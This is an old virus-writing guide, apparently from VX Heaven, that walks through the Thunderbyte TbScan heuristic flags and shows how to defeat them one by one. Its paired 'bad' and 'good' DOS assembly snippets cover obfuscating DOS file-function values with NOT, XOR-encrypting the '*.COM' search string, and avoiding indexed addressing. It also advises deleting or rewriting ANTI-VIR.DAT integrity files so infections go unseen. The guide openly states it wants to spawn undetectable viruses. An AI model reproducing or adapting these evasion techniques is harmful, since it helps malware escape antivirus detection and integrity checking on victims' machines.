VX Heaven

A guide to Anti-Heuristics / Shmistics Technology

Kohntark

INTRO

Dear Reader:

If you have been following the Virus / Anti-virus scene you might have stumbled upon the word "Heuristics." Heuristics is a term commonly used in artificial intelligence programs (Expert Systems etc.).

So what does artificial intelligence have to do with software that is not even able to catch a Vienna.Grandma.Variant.#100 virus (CARO Name?) created by a 15 year old in his spare time?

Well, it seems that the AV marketing strategists are running out of new technologies to sell to the ever hi-new-vapor-tech hungry public and have decided to add artificial intelligence to the latest Antiviral software bag of tricks.

But how intelligent are these "heuristics" programs really? Is it just another vain marketing trick or is the sunrise of artificial intelligence upon us? Can we really have intelligent programs created by fools and demented megalomaniacs?

I claim that heuristics AV programs are not intelligent at all, and I will prove it.

First, please enter Thunderbyte Anti-Virus (TBAV), the Dutch shareware package that has become an underground favourite due to its liberal use of the word "heuristics" and to its above-average quality.

TBSCAN, TBAV's scanner, is an incredibly fast program that usually identifies a high percentage of new and unknown viruses. TBSCAN is the most reliable scanner to discover the not-yet-named ditties created all around the world.

Until Now.

Enter Kohntark's "Heuristics / Shmistics guide." This informative program will show you how TBSCAN really works, how to ridicule this program, and to beat it flag by flag (you can think of flags as Heuristics warnings.)

Now you can be the first one in your block to write anti-heuristics / Shmistics viruses!

The process is incredibly simple: For each Flag or heuristic warning I have listed a BAD CODE (Example of evil, ugly code that causes heuristics flags to go off.) and GOOD CODE (Example of Good, Anti-Heuristics code.)

All you have to do when you have a virus that raises specific flags in TBSCAN is:

  1. Look up the specific Flag in the Heuristics / Shmistics guide
  2. Look at the DON'T code (which corresponds more or less to your code)
  3. Study the solution in the DO part.
  4. Adapt the solution to your particular code.

And voila!, viruses free of shmistics!

With this program I have included 2 BIG examples:

A GOOD example, the first virus this side of the galaxy not to raise ANY heuristics flags when scanned by TBSCAN.

An EVIL example: a donothing file that, as you might have guessed, does not do anything, and raises more heuristics flags than any virus known to mankind.

I hope this information is enough to spawn the next generation of anti-heuristic / shmistic viruses, to inspire virus programmers worldwide to write and modify the trillions of viruses used as currency by some people, and to force the AV marketing strategists to come up with better ideas next time.

(Shall I mention that Thunderbyte will have to rewrite its scanner?)

				enjoy!
				Kohntark

TBAV Terminology

  1. Looking
  2. Checking
  3. Tracing
  4. Scanning
  5. Skipping

"Looking" means that TbScan has successfully located the entry point of the program in one step. The program code has been identified so TbScan knows where to search without the need of additional analysis.

Looking will be used on most files produced by known software.

"Checking" means that TbScan has successfully located the entry point of the program, and is scanning a frame of about 4Kb around the entry point. If the file is infected the signature of the virus will be in this area. "Checking" is a very fast and reliable scan algorithm.
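The frame-based scan described above can be pictured with a small sketch. It is not TbScan's actual implementation: the function name `scan_frame`, the signature dictionary and the centring of the frame on the entry point are all assumptions made for illustration, and only the "about 4Kb around the entry point" figure comes from the description.

```python
from typing import Dict, List


def scan_frame(data: bytes, entry: int, signatures: Dict[str, bytes],
               frame: int = 4096) -> List[str]:
    """Return the names of signatures found in a frame around the entry point.

    Hypothetical helper: only the bytes within roughly frame/2 on either
    side of the entry point are searched, not the whole file.
    """
    half = frame // 2
    start = max(0, entry - half)          # clamp to the start of the file
    end = min(len(data), entry + half)    # clamp to the end of the file
    window = data[start:end]
    return [name for name, pattern in signatures.items() if pattern in window]
```

Searching only the window is what makes this kind of scan fast, and it is also why a signature lying far away from the entry point would go unnoticed by it.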

Checking will be used on most files that are not produced by known software.

"Tracing" means that TbScan has successfully traced a chain of jumps or calls while locating the entry-point of the program, and is scanning a frame of about 4Kb around this location. If the file has been infected, the signature of the virus will be in this area. "Tracing" is a fast and reliable scan algorithm.

Tracing will be primarily used for TSR-type COM files or Turbo Pascal-compiled programs. Most viruses will force TbScan to use "Tracing".

"Scanning" means that TbScan is scanning the entire file (except for the exe-header which cannot contain any viral code). This algorithm will be used if "Looking", "Checking" or "Tracing" cannot be safely used. This is the case when the entry-point of the program contains other jumps and calls to code located outside the scanning frame, or when the heuristic analyzer found something that should be investigated more thoroughly. "Scanning" is a slow algorithm. Because it processes almost the entire file, including data areas, false alarms are more likely to occur.

The "Scanning" algorithm will be used while scanning bootsectors, SYS and BIN files.

"Skipping" will occur with SYS and OVL files only. It simply means that the file will not be scanned. As there are many SYS files that contain no code at all (like CONFIG.SYS) it makes absolutely no sense to scan these files for viruses. The same applies to .OV? files. Many overlay files do not deserve to be called as such as they lack an exe-header. Such files cannot be invoked through DOS, making them just as invulnerable to direct virus attacks as .TXT files are. If a virus is reported to have infected an .OV? file, it involved one of the relatively few overlay files that do contain an exe-header. The infection was then the result of the virus monitoring the DOS exec-call (function 4Bh) and infecting any program being invoked that way, including "real" overlay files.

TBAV Flags
# - Decryptor code found
! - Invalid program.
1 - 80186+ instructions.
@ - Strange instructions
? - Inconsistent header.
c - No integrity check
h - Hidden or System file.
i - Internal overlay.
p - Packed or compressed file.
w - Windows or OS/2 header.
A - Suspicious Memory Allocation
B - Back to entry.
C - File has been changed
D - Direct disk access
E - Flexible Entry-point
F - Suspicious file access
G - Garbage instructions.
J - Suspicious jump construct.
K - Unusual stack.
L - Program load trap
M - Memory resident code.
N - Wrong name extension.
O - code Overwrite.
R - Suspicious relocator
S - Search for executables
T - Invalid timestamp.
U - Undocumented system call.
V - Validated program
Y - Invalid boot sector.
Z - EXE/COM determinator.

# - Decryptor code found.

The file possibly contains a self-decryption routine. Some copy-protected software is encrypted so this warning may appear for some of your files. But if this warning appears in combination with, for example, the "T" (invalid time stamp) warning, there could be a virus involved and TbScan assumes the file is contaminated! Many viruses encrypt themselves and cause this warning to be displayed.

BAD_CODE

TBSCAN will trace right thru the most complicated encryption routines.. for polymorphic viruses this flag will be set most of the times.. including MTE and most TPE.. The more complex the routines are the more chances your virus has of setting other flags such as the G (Garbage code) flag.

GOOD_CODE

The trick here is to use dumb encryption routines, the kind the virus-guide writers hate.. why? because they are common in commercial and shareware software programs and they are non-suspicious looking. The main drawback with "Heuristics" Scanning is the possible number of false positives, and using commonly used encryption routines makes things worse.

This is why self-appointed AV "researchers" had a hard time coming up with reliable detection methods for Trident's Polymorphic Engine, since it generates a lot of commonly found decryptors/encryptors. Also I must note that there are a couple of extremely esoteric encryption routines that will not be recognized by TBSCAN as encryptions at all!

! - Invalid program.

Invalid opcode (non-8088 instructions) or out-of-range branch. The program has either an entry point that is located outside the body of the file, or reveals a chain of jumps that can be traced to a location outside the program file. Another possibility is that the program contains invalid processor instructions. The program being checked is probably damaged and cannot execute in most cases. At any rate, TbScan avoids risk and uses the scan method to scan the file.

1 - 80186+ instructions.

The file contains instructions which cannot be executed by 8088 processors, and require an 80186 or better processor.

@ - Strange instructions

The file contains instructions which are not likely to be generated by an assembler, but by some code generator like a polymorphic virus instead.

? - Inconsistent header.

The program being processed has an EXE-header that does not reflect the actual program lay-out. Many viruses do not update the EXE-header of an EXE file correctly after they infect the file, so if this warning pops up frequently, it appears you have a problem.

h - Hidden or System file.

The file has the Hidden or the System file attribute set. This means that the file is not visible in a DOS directory display but TbScan scans it anyway. If you don't know the origin and/or purpose of this file, you might be dealing with a Trojan Horse or a joke virus program. Copy such a file onto a diskette, remove it from its program environment, and then check if the program concerned is missing the file. If a program does not miss it, you not only have freed some disk space, but you might also have prevented a future disaster.

i - Internal overlay.

The program being processed has additional data or code behind the load-module as specified in the EXE-header of the file. The program might have internal overlay(s) or configuration or debug information appended behind the load-module of the EXE file.
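To make the "?" and "i" descriptions concrete, here is a rough sketch of how the load-module size stored in an EXE header can be compared with the real file length. The header fields used (signature, bytes in last page, page count) are the standard DOS EXE header layout. The function names and the mapping of the two outcomes to the "i" and "?" letters are assumptions for illustration, since TbScan's real criteria are not documented here.

```python
import struct


def exe_load_module_size(header: bytes) -> int:
    """Size in bytes of the EXE image (header + load module) as the header claims."""
    sig, last_page_bytes, pages = struct.unpack_from("<2sHH", header, 0)
    if sig not in (b"MZ", b"ZM"):
        raise ValueError("not an EXE header")
    size = pages * 512                      # pages are 512 bytes each
    if last_page_bytes:
        size -= 512 - last_page_bytes       # last page is only partly used
    return size


def classify_exe_length(header: bytes, file_size: int) -> str:
    """Hypothetical mapping of the size comparison to a flag letter."""
    image = exe_load_module_size(header)
    if file_size > image:
        return "i"    # data or code appended behind the load module
    if file_size < image:
        return "?"    # header describes more than the file contains
    return ""
```

A header claiming 3 pages with 100 bytes in the last page describes a 1124-byte image, so a 2000-byte file would have 876 bytes behind the load module.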

p - Packed or compressed file.

This means that the program is packed or compressed. There are some utilities that can compress program files, such as EXEPACK and PKLITE. If the file became infected after compression, TbScan is able to detect the virus. However, if the file became infected before compression, the virus was also compressed in the process, and a virus scanner might no longer be able to recognize the virus. Fortunately, this does not happen very often, but you should still beware! A new program might look clean, but can turn out to be the carrier of a compressed virus. Other files in your system will become infected too, and it is these infections that will be clearly visible to virus scanners.

w - Windows or OS/2 header.

The program can be or is intended to run in a Windows (or OS/2) environment. TbScan offers a specialized scanning method for these files.

C - File has been changed

This warning appears only if you use TbSetup to generate the ANTI-VIR.DAT files and means the file has been changed. Upgrading the software would trigger this message. Otherwise, it is very likely that a virus infected the file!

NOTE: TbScan does not display this warning if only some internal configuration area of the file changes. This warning means that code at the program entry point, the entry-point itself, and/or the file size has been changed.

GOOD_CODE

The only way to avoid this is to delete or modify the Anti-Vir.Dat file in each directory where you are infecting files to. The easiest method is to delete the file, to overwrite or truncate it, so it cannot be undeleted by a "smart" user. For perfect "stealth" one could modify the contents of the file, putting the right flag in the file-to-be-infected field describing it as a "self-modifying" file. This is more involved and requires unnecessary code, since the deleting of checksum files can be implemented as a universal attack against several integrity checking programs, not just TBSCAN.

c - No integrity check.

This warning indicates that no checksum/recovery information has been found about the indicated file. It is highly recommended to use TbSetup in this case to store information of the mentioned file. This info can later be used for integrity checking and to recover from virus infections.

GOOD_CODE

This is not really a flag... it won't raise any warnings by itself.. This only means that the file ANTI-VIR.DAT wasn't found in the current directory you are scanning.. this is good news of course, as TBSCAN cannot verify any checksum information for the files...

F - Suspicious file access.

TbScan has found instruction sequences common to infection schemes used by viruses. This flag will appear with those programs that are able to create or modify existing files.

BAD_CODE

;Restore date and time of file to be infected

mov ax,5701h
mov dx,WORD PTR [si + OFFSET F_DATE - OFFSET VIRUS]
mov cx,WORD PTR [si + OFFSET F_TIME - OFFSET VIRUS]
int 21h

;Restore file attributes

lea dx,[si + FNAME - OFFSET VIRUS] ;get filename
mov cx,[si + ATTR - OFFSET VIRUS] ;get old attributes
mov ax,4301h ;set file attributes to cx
int 21h

GOOD_CODE

;Restore date and time of file to be infected

mov ax,0A8FEh
mov dx,WORD PTR [si + F_DATE - OFFSET VIRUS]
mov cx,WORD PTR [si + F_TIME - OFFSET VIRUS]
not ax ;A8FE becomes 5701
int 21h

;Restore file attributes

lea dx,[si + OFFSET FNAME - OFFSET VIRUS] ;get filename
mov cx,[si + OFFSET ATTR - OFFSET VIRUS] ;get old attributes
mov ax,0BCFEh
not ax ;BCFE becomes 4301h
int 21h

There are a million different ways of doing this; this is just an example.

R - Suspicious relocator.

Flag "R" refers to a suspicious relocator. A relocator is a sequence of instructions that changes the proportion of CS:IP. It is often used by viruses, especially COM type infectors. Tests on a large collection of viruses show that TbScan issues this flag for about 65% of all viruses. Those viruses have to relocate the CS:IP proportion because they have been compiled for a specific location in the executable file; a virus that infects another program can hardly ever use its original location in the file as it is appended to this file. Sound programs "know" their location in the executable file, so they don't have to relocate themselves. On systems that operate normally only a small percentage of the programs should therefore cause this flag to be displayed.

BAD_CODE

;*****************
; 1-OPEN FILE
;*****************

lea dx,[si + OFFSET FNAME - OFFSET VIRUS]	;open the file
mov ax,3D02h					;r/w access to it
int 21h
jc NO_GOOD					;error.. quit
xchg ax,bx					;bx = file handle

Where do you think the problem is? Well, you might have read in clumsy virus writing guides of the joys of using indexed instructions to access the virus' data locations in memory to make your code fast and small. The "experts" use them even in their soup and it makes their code tight. Well, do you want tight code that can be recognized as a virus from miles away or do you want real, undetectable viruses? If you chose the latter do yourself a favour.. minimize the use of indexes. TBSCAN will set the R flag with just a few of them anywhere in your code.

GOOD_CODE

mov bp,si					;flabby, fat code
add bp,OFFSET FNAME - OFFSET VIRUS		;but it unsuspicious!
mov dx,bp

mov ax,3D02h					;r/w access to it
int 21h
jc NO_GOOD					;error.. quit
xchg ax,bx					;bx = file handle

You can apply the same solution for any code that can be indexed:

mov WORD PTR [si + ATTR - VIRUS],cx		;save attributes
cmp BYTE PTR [si + START_CODE+3 - VIRUS],20h	;check for " "
add WORD PTR [si + LOC - VIRUS],cx
sub WORD PTR [si + LOC1 - VIRUS],dx
etc..

The strategy is the same.. it might add a lot of "fat" to your code, but a fat virus is better than a dead one.

N - Wrong name extension.

Name conflict. The program carries the extension .EXE but appears to be an ordinary .COM file, or it has the extension .COM but the internal layout of an .EXE file. TbScan does not take any risk in this situation, but scans the file for both EXE and COM type signatures. A wrong name extension might in some cases indicate a virus, but in most cases it doesn't.
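The name conflict described above comes down to comparing the file extension with the first two bytes of the file. A minimal sketch, assuming the helper names `has_exe_header` and `wrong_name_extension` (both hypothetical) and relying only on the fact that DOS EXE files start with the signature "MZ" (or "ZM"):

```python
import os


def has_exe_header(data: bytes) -> bool:
    """True if the file starts with the DOS EXE signature."""
    return data[:2] in (b"MZ", b"ZM")


def wrong_name_extension(filename: str, data: bytes) -> bool:
    """True when the extension and the internal layout disagree."""
    ext = os.path.splitext(filename)[1].upper()
    if ext == ".EXE":
        return not has_exe_header(data)   # named EXE, laid out like a COM
    if ext == ".COM":
        return has_exe_header(data)       # named COM, carries an EXE header
    return False
```

A COM-named file that begins with "MZ" would be reported, which is why legitimate files of that kind also raise the flag.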

BAD_CODE

This will occur in extremely buggy viruses that cannot distinguish EXE files from COMs or in stupid overwriting viruses. There are also a couple of DOS 5.0 files, specifically DISK.COM, that have an EXE header. Special care must be taken not to raise extra flags, since any possible host may have heuristic flags of its own, and any heuristic flags added by the virus will just make the file more suspicious.

S - Search for executables.

The program searches for *.COM or *.EXE files. This by itself does not indicate a virus, but it is an ingredient of most viruses anyway (they have to search for suitable files to spread themselves). If accompanied by other flags, TbScan will assume the file is infected by a virus.

BAD_CODE

The following code (even by itself!) is enough to set this flag:

	db '*.COM'
	db '*.EXE'

GOOD_CODE

To get around this use what I call "point-encryption routine" to make the strings into something not recognizable.. (Also, see the Z flag)

mov bp,OFFSET COM_FILES				;decrypt *.COM string
call POINT_ENCRYPT
add bp,02
call POINT_ENCRYPT

lea dx,[si + OFFSET COM_FILES - OFFSET VIRUS ]	;dont use this..
;see R flag
mov ax,04E00h					;mov ah,4eh, => DOS search 1st file function
mov cx,3fh					;search for any file, with any attributes
int 21H
etc..

POINT_ENCRYPT

push bp						;save bp to do dword encryptions
etc.

add bp,si
sub bp,OFFSET VIRUS				;the entry point of the virus is on si
xor WORD PTR [bp],ID2
pop bp						;restore bp
ret						;return to caller

COM_FILES
db 5Dh,59h,34h,38h,'M',0			;encrypted *.COM,0

ID2 equ 7777h					;(used in POINT_ENCRYPT)

This is just one (and rather inefficient) way of doing this... there are a million other ways... this is just to give you an idea. For a more efficient way look in the example virus.

A - Suspicious Memory Allocation

The program uses a non-standard way to search for, and/or to allocate memory. Many viruses try to hide themselves in memory, so they use a non-standard way to allocate this memory. Some programs (such as high-loaders or diagnostic software) also use non-standard ways to search or allocate memory.

B - Back to entry.

The program seems to execute some code, and after that jumps back to the entry-point of the program. Normally this results in an endless loop, except when the program also modifies some of its instructions. This is quite common behavior for computer viruses. In combination with any other flag, TbScan reports a virus.

D - Direct disk access

This flag appears if the program being processed has instructions near the entry-point to write to a disk directly. It is quite normal that some disk related utilities trigger this flag. If several files that should not be writing directly to the disk trigger this flag, your system might be infected by an unknown virus.

NOTE: A program that accesses the disk directly does not always have the "D" flag. Only when the direct disk instructions are near the program entry point does TbScan report it. If a virus is at fault, the harmful instructions are always near the entry point, so it is only there that TbScan looks for them.

E - Flexible Entry-point

This flag indicates that the program starts with a routine that determines its location within the program file. This is rather suspicious because sound programs have a fixed entry-point so they do not have to determine this location. For viruses, however, this is quite common. Approximately 50% of the known viruses trigger this flag.

G - Garbage instructions.

The program contains code that seems to have no purpose other than encryption or avoiding recognition by virus scanners. In most cases there won't be any other flag since the file is encrypted and the instructions are hidden.

NOTE: This flag appears occasionally on "normal" files. This simply indicates, however, that these are poorly designed, not infected.

J - Suspicious jump construct.

The program did not start at the program entry point. The code has either jumped at least twice before reaching the final startup code, or the program jumped using an indirect operand. Sound programs should not display this kind of strange behavior. If several files trigger this flag, you should investigate your system thoroughly.

K - Unusual stack.

The EXE file being processed has an odd (instead of even) stack offset or a suspicious stack segment. Many viruses are quite buggy by setting up an illegal stack value.
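The "odd stack offset" part of this check can be read straight from the EXE header, where the initial SS and SP values sit at offsets 0Eh and 10h. The sketch below covers only that part. The function names are hypothetical, and what TbScan counts as a "suspicious stack segment" is not specified, so it is not modelled.

```python
import struct


def initial_stack(header: bytes) -> tuple:
    """Return (SS, SP) as stored in a DOS EXE header."""
    ss, sp = struct.unpack_from("<HH", header, 0x0E)
    return ss, sp


def has_odd_stack(header: bytes) -> bool:
    """True if the initial SP is odd instead of even."""
    _, sp = initial_stack(header)
    return sp % 2 == 1
```

Since the 8086 pushes and pops whole words, a normally linked program has no reason to start with an odd SP.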

L - Program load trap

The program might trap the execution of other software. If the file also triggers the "M" flag (memory resident code), it is very likely that the file is a resident program that determines when another program executes. Many viruses trap the program load and use it to infect the program. Some anti-virus utilities also trap the program load.

M - Memory resident code.

TbScan has found instruction sequences that could cause the program to hook into important interrupts. Many TSR (Terminate and Stay Resident) programs trigger this flag because hooking into interrupts is part of their usual behavior. If several non-TSR programs trigger this warning flag, however, you should be suspicious. It is likely that a virus that remains resident in memory infected your files.

NOTE: This warning does not appear with all true TSR programs, nor can you always rely upon TSR detection in non-TSR programs.

O - code Overwrite.

This flag appears if TbScan detects that the program overwrites some of its instructions. However, it does not seem to have a complete (de)cryptor routine.

T - Invalid timestamp.

The timestamp of the program is invalid; that is, the number of seconds in the time stamp is illegal, or the date is illegal or later than the year 2000. This is suspicious because many viruses set the time stamp to an illegal value (such as 62 seconds) to mark that they already infected the file so they won't infect a file a second time. It is possible that the program being checked is contaminated with a virus that is still unknown, especially if several files on your system have an invalid time stamp. If only very few programs have an invalid time stamp, you'd better correct it and scan frequently to check that the time stamp of the files remains valid.
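A value like "62 seconds" is possible because DOS packs the time into one 16-bit word and stores the seconds divided by two in a 5-bit field, so field values 30 and 31 decode to 60 and 62. The following sketch decodes the packed words and applies the checks listed above. The function names and the `max_year` parameter are assumptions for illustration, not TbScan's own code.

```python
import calendar


def decode_dos_time(time_word: int) -> tuple:
    """Unpack a DOS time word into (hours, minutes, seconds)."""
    hours = (time_word >> 11) & 0x1F
    minutes = (time_word >> 5) & 0x3F
    seconds = (time_word & 0x1F) * 2      # stored in 2-second units
    return hours, minutes, seconds


def decode_dos_date(date_word: int) -> tuple:
    """Unpack a DOS date word into (year, month, day)."""
    year = 1980 + ((date_word >> 9) & 0x7F)
    month = (date_word >> 5) & 0x0F
    day = date_word & 0x1F
    return year, month, day


def is_valid_dos_timestamp(date_word: int, time_word: int,
                           max_year: int = 2000) -> bool:
    """False for illegal times, illegal dates, or years after max_year."""
    hours, minutes, seconds = decode_dos_time(time_word)
    year, month, day = decode_dos_date(date_word)
    if hours > 23 or minutes > 59 or seconds > 59:
        return False
    if not 1 <= month <= 12:
        return False
    if not 1 <= day <= calendar.monthrange(year, month)[1]:
        return False
    return year <= max_year
```

The year cutoff mirrors the "later than the year 2000" wording of the description and would obviously need adjusting on any modern system.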

U - Undocumented system call.

The program uses unknown DOS calls or interrupts. These unknown calls can be issued to invoke undocumented DOS features, or to communicate with an unknown driver in memory. Since many viruses use undocumented DOS features, or communicate with memory resident parts of a previously loaded instance of the virus, a program is suspicious if it performs unknown or undocumented communications. This does not necessarily indicate a virus, however, since some tricky programs also use undocumented features.

V - Validated program

The program has been validated to avoid false alarms. The design of this program would normally cause a false alarm by the heuristic scan mode of TbScan, or this program might change frequently, and TbScan excludes the file from integrity checking. Either TbSetup (automatically) or TbScan (manually) stores these exclusions in the ANTI-VIR.DAT file.

Y - Invalid boot sector.

The boot sector is not completely according to the IBM defined boot sector format. It is possible that the boot sector contains a virus or has been corrupted.

Z - EXE/COM determinator.

The program seems to check whether a file is a COM or EXE type program. Infecting a COM file is a process that is not similar to infecting an EXE file, which implies that viruses able to infect both program types should also be able to distinguish between them. There are, of course, innocent programs that need to find out whether a file is a COM or EXE file. Executable file compressors, EXE2COM, converters, debuggers, and high-loaders are examples of programs that might contain a routine to distinguish between EXE and COM files.
